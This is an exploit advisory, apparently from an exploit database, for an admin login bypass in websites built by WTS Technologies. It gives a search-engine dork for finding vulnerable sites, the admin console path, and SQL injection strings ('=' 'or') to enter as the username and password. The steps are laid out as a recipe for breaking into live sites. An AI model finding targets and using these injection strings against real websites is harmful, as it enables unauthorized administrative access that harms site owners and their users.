WTS Technologies Admin Login bypass

Published
Credit
Risk
2017.05.30
Magelang1337
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: "Powered by WTS Technologies"

======================================================
# Exploit Title: WTS Technologies Admin Login bypass
# Dorks : "Powered by WTS Technologies"
# Date: 2017-05-26
# Author: Magelang1337
# Vendor : http://www.wtstechnologies.co.uk/
# Tested on: windows
======================================================
Tutor:

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or' | admin
[+] Password: '=' 'or' | admin
======================================================
Admin Page : sitetarget.com/console/
======================================================
Thanks : nginxDEX | XnonGermx | Codename | Vcry | StuxN3t | Kerens_id

References:

Magelang1337.com


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com